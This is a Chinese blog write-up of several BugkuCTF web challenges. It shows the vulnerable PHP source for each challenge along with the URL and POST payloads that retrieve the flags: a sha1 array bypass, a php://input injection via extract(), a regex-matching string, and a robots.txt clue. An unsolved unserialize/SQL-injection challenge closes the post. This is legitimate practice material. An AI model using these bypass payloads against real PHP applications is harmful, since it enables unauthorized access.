bugkuCTF Writeup (Web)31-35

最新推荐文章于 2024-07-12 20:47:16 发布
最新推荐文章于 2024-07-12 20:47:16 发布
阅读量1.7k 收藏
点赞数
分类专栏: CTF 文章标签: CTF Web PHP
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/troublor/article/details/79217918
版权

各种绕过哟

这里写图片描述
代码审计

<?php 
highlight_file('flag.php'); 
$_GET['id'] = urldecode($_GET['id']); 
$flag = 'flag{xxxxxxxxxxxxxxxxxx}'; 
if (isset($_GET['uname']) and isset($_POST['passwd'])) { 
    if ($_GET['uname'] == $_POST['passwd']) 

        print 'passwd can not be uname.'; 

    else if (sha1($_GET['uname']) === sha1($_POST['passwd'])&($_GET['id']=='margin')) 

        die('Flag: '.$flag); 

    else 

        print 'sorry!'; 

} 
?>

用数组绕过sha1,传入uname和passwd都为数组
payload:http://120.24.86.145:8002/web7/?uname[]=1&id=margin
post:passwd[]=2
获得flag
这里写图片描述

Web8

这里写图片描述
代码审计

<?php
extract($_GET);
if (!empty($ac))
{
$f = trim(file_get_contents($fn));
if ($ac === $f)
{
echo "<p>This is flag:" ." $flag</p>";
}
else
{
echo "<p>sorry!</p>";
}
}
?>

用php://input
payload:http://120.24.86.145:8002/web8/?ac=aaa&fn=php://input
postdata:aaa
得flag
这里写图片描述

字符?正则?

这里写图片描述
代码审计

<?php 
highlight_file('2.php');
$key='KEY{********************************}';
$IM= preg_match("/key.*key.{4,7}key:\/.\/(.*key)[a-z][[:punct:]]/i", trim($_GET["id"]), $match);
if( $IM ){ 
  die('key is: '.$key);
}
?>

get的参数id只要满足正则表达式即可,很基础
payload:http://120.24.86.145:8002/web10/?id=key1key2222key:/3/4keya.
这里写图片描述

考细心

这里写图片描述

打开来看,是一个很假的404,看http相应果然是200
这里写图片描述
在这里很久也没找的有价值的线索
后来才知道网站根目录下有时候会放一个robots.txt来告诉各种爬虫哪些页面可以抓取,那些不行
这里就是查看这个txt,发现一个页面/resusl.php
打开来看:


要提供get参数x
也没有什么头绪,只是题目提示里面说“想办法变成admin”,用admin作为x参数试了试,就成功了,想不到这题这么设置有什么意义
这里写图片描述

php代码审计

这里写图片描述
这题说还没弄好?也不知道是真是假,前面那么多题的各种脑洞让我的怀疑能力非常强大
点进去是代码审计

<?php

include "config.php";

class HITCON{
    private $method;
    private $args;
    private $conn;

    public function __construct($method, $args) {
        $this->method = $method;
        $this->args = $args;

        $this->__conn();
    }

    function show() {
        list($username) = func_get_args();
        $sql = sprintf("SELECT * FROM users WHERE username='%s'", $username);

        $obj = $this->__query($sql);
        if ( $obj != false  ) {
            $this->__die( sprintf("%s is %s", $obj->username, $obj->role) );
        } else {
            $this->__die("Nobody Nobody But You!");
        }

    }

    function login() {
        global $FLAG;

        list($username, $password) = func_get_args();
        $username = strtolower(trim(mysql_escape_string($username)));
        $password = strtolower(trim(mysql_escape_string($password)));

        $sql = sprintf("SELECT * FROM users WHERE username='%s' AND password='%s'", $username, $password);

        if ( $username == 'orange' || stripos($sql, 'orange') != false ) {
            $this->__die("Orange is so shy. He do not want to see you.");
        }

        $obj = $this->__query($sql);
        if ( $obj != false && $obj->role == 'admin'  ) {
            $this->__die("Hi, Orange! Here is your flag: " . $FLAG);
        } else {
            $this->__die("Admin only!");
        }
    }

    function source() {
        highlight_file(__FILE__);
    }

    function __conn() {
        global $db_host, $db_name, $db_user, $db_pass, $DEBUG;

        if (!$this->conn)
            $this->conn = mysql_connect($db_host, $db_user, $db_pass);
        mysql_select_db($db_name, $this->conn);

        if ($DEBUG) {
            $sql = "CREATE TABLE IF NOT EXISTS users ( 
                        username VARCHAR(64), 
                        password VARCHAR(64), 
                        role VARCHAR(64)
                    ) CHARACTER SET utf8";
            $this->__query($sql, $back=false);

            $sql = "INSERT INTO users VALUES ('orange', '$db_pass', 'admin'), ('phddaa', 'ddaa', 'user')";
            $this->__query($sql, $back=false);
        } 

        mysql_query("SET names utf8");
        mysql_query("SET sql_mode = 'strict_all_tables'");
    }

    function __query($sql, $back=true) {
        $result = @mysql_query($sql);
        if ($back) {
            return @mysql_fetch_object($result);
        }
    }

    function __die($msg) {
        $this->__close();

        header("Content-Type: application/json");
        die( json_encode( array("msg"=> $msg) ) );
    }

    function __close() {
        mysql_close($this->conn);
    }

    function __destruct() {
        $this->__conn();

        if (in_array($this->method, array("show", "login", "source"))) {
            @call_user_func_array(array($this, $this->method), $this->args);
        } else {
            $this->__die("What do you do?");
        }

        $this->__close();
    }

    function __wakeup() {
        foreach($this->args as $k => $v) {
            $this->args[$k] = strtolower(trim(mysql_escape_string($v)));
        }
    }
}

if(isset($_GET["data"])) {
    @unserialize($_GET["data"]);    
} else {
    new HITCON("source", array());
}

这是要传入get参数data,然后利用unserialize的时候创建HITCON对象然后在程序运行结束的时候调用__destruct方法,进行注入,但是试了一下发现程序返回结果的逻辑好像和代码上显示的不太一样,可能真的是不能做吧。跳过了

Troublor
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BugkuCTF练习题解——Web
qq_41739275的博客
08-24 5943
文章目录1.Web22.计算器3.Web基础$_GET4.Web基础$_POST5.矛盾6.Web37.域名解析8.你必须让他停下9.本地包含10.变量111.Web512.头等舱13.网站被黑14.管理员系统15.Web416.flag在index中17.输入密码查看flag18.点击100万次19.备份是个好习惯 1.Web2 打开链接之后是滑稽笑脸,好家伙,吓我一跳,还以为是大bug,然后也没有提示啥的 感觉有点无从下手???别急,打开页面源代码(检查元素也可)瞅瞅 注释部分就是flag了。 2.
Bugku CTF web30(Web
ChaoYue_miku的博客
03-13 355
0、打开网页,查看PHP源码 题目描述:txt???? <?php extract($_GET); if (!empty($ac)) { $f = trim(file_get_contents($fn)); if ($ac === $f) { echo "<p>This is flag:" ." $flag</p>"; } else { echo "<p>sorry!</p>"; } } ?> ...
PwnTheBox,Web:对方不想和你说话,并向你扔了一段代码
Pai_Space
06-05 366
逻辑漏洞
2024年最全CTF BugKu平台—(Web篇①)_ctf bugku web(1),金三银四我带你去BAT面试现场
2401_84281698的博客
05-11 700
白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上网络安全知识点,真正体系化!即num既不能是数字字符,但是要等于1,我们可以想到用科学计数法表示数字1,既不是纯数字,其值又等于1因此。这里的sign显示是加密的。这里是zMNTA,这里我好几次都是zM开头的 ==结束的,查看源代码。弱密码top1000?是一个弹窗 F12 找到一些线索,估计是编码,看了一下下面的评论知道是Unicode编码。通过url传入what的值,让其等于flag,直接构造url就得到flag。
Bugku---web---速度要快
最新发布
weixin_47450099的博客
07-12 1170
学习到cookie,提示利用python脚本建立与服务器之间的交互功能,以此查看flag
BUGKU题目之速度要快
QingHe1314的博客
11-08 437
初入Python,看到很多大佬都是通过写脚本的方式获取到FLAG,因为抓到的包的response里falg一直会变。这里呈上大佬的Python脚本。顺便学习,把函数的用法记下,方便日后自己的学习。 #coding:utf-8 import requests #引入模板 import base64 s =requests.Session() #记录session hea...
BUGKU-CTF入门笔记
Emooooor的博客
12-05 634
CTFBUGKU、入门、夺旗赛、网络安全、web安全
BugkuCTF web
weixin_45689999的博客
01-19 784
1.web2 先打开F12看看,很容易发现在注释里面有flag。 把flag后面内容输入即可。 2.计算器 发现是一道及其简单的计算题(要是手上没有计算器有些题比较难算的话,可以点击题目换一道蛤,但是怎么换答案都是两位数以上的),输入答案,发现只能输入一位数,打开F12 发现他可输入字符长度为1,双击修改成10等位数,再输入正确答案,flag就出现了。 3.web基础-GET变量参考以下网址了解_...
BUGkuCTF
bigbigworld666的博客
06-26 1370
BUGkuCTF (一)WEB (1)web2 进入环境,首先看源码,在里面直接找到flag [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-97sg5F09-1593143273882)(file:///C:/Users/HP/AppData/Local/Temp/msohtmlclip1/01/clip_image002.gif)] (2)计算器 首先输入数字发现只能输入1个,所以F12去修改源码,将maxlength修改,然后填入正确数字即可出现flag [外链图片转存失
CTF | bugku | 速度要快
diemaoye6838的博客
09-07 197
检查源码时发现有 <!-- OK ,now you have to post the margin what you find --> 检查响应头发现有 flag: 6LeR55qE6L+Y5LiN6ZSZ77yM57uZ5L2gZmxhZ+WQpzogTWpZNE9USTU= 然后写代码爬网页 ''' @Modify ...
速度要快bugku!wp
qq_41333578的博客
06-16 340
第一次正式写博客记录学习啦 这是一道bugku平台的一道web题,今天距上一次写CTF题差不多有两个月了,抱歉!走了一趟写策划书的开发路线(发现自己真语言组织能力太low,而且也没啥开发经验,就像写作文一样次次都是写着文档走创意赛,,,),打算回归我的CTF正常轨道,希望还能赶上之前的朋友们进度,为自己鼓励!!!! 屁话太多,会被打,言归正题 首先这题是一周前写的,今天重做了一遍 打开网站,常规...
速度要快 --- BugKu writeup
那酷小样的博客
10-08 1590
import requests import base64 #bugku --- 速度要快 url = 'http://120.24.86.145:8002/web6/' req = requests.session() res = req.get(url) #获取请求头中的flag flag = res.headers['flag'] #对flag进行base64解码 --- 得到的是...
CTF/CTF练习平台-welcome to bugkuctfphp://filter及php://input】
热门推荐
Sp4rkW的博客
09-01 3万+
原题内容: http://120.24.86.145:8006/test1/ 首先bp一下,可见提示源码: &lt;!-- $user = $_GET["txt"]; $file = $_GET["file"]; $pass = $_GET["password"]; if(isset($user)&amp;&amp;(file_get_contents($...
Bugku-INSERT INTO 注入
苟有恒,必有三更眠,五更起。
07-08 949
INSERT INTO 注入 原题链接 http://120.24.86.145:8002/web15/ 分析 题目给出源码 &lt;?php error_reporting(0); function getIp(){ $ip = ''; if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){ $ip = $_SERVE...
welcome to bugkuctf
小白的劝退之路
05-22 341
打开后,查看源码 很显然想让我们利用源码去得到flag。这里我们稍微解释下这个源码的意思。 开始有三个变量:user,file,pass,但是我们发现这里的pass也就是password没有什么用,所以我们重点关注前两个变量。看下面的条件 (1)这里isset的意思是查看变量是否存在,即user不能为空。 (2)file_get_contents是把整个文件读入字符串中,这里也就是把user这个变量(user显然要是一个文件)的内容以字符串的方式读出来并且要和“welcome to the bugkuctf
BugkuCTF 速度要快
s0il的博客
03-25 717
题目内容: 查看源码: </br>我感觉你得快点!!!<!-- OK ,now you have to post the margin what you find --> 一头雾水的我去看了大佬的博客 抓包看看头: import requests res = r...
CTFBugku insert into注入
weixin_41607190的博客
01-07 368
原理:x-forwared-for注入,时间盲注,insert注入 点开网址就是这么一句话,源码也给出 function getIp(){ $ip = ''; if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){ $ip = $_SERVER['HTTP_X_FORWARDED_FOR']; #从x-forwared-for获取ip }else{ $ip =...
Bugku CTF web-19 速度要快
weixin_47387913的博客
04-14 917
Bugku CTF web-19 速度要快 在ctf-web板块攻破了一些题目,每当提交flag的时候总是忘记了写一下攻题过程,这里直接开始web-19的总结,已经到了自己写脚本的题目,python的学习刻不容缓,现阶段脚本还是参考的前辈们的代码(用了就得学会………)。 一、 尝试 拿到网址,访问,‘我感觉你得快点!!!’,或许F5快一点刷新能出来flag(尝试总是没有错的,之前的一个题目确实是需要刷新),但是尝试过后无反应,F12以及查看页面源代码无flag信息...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值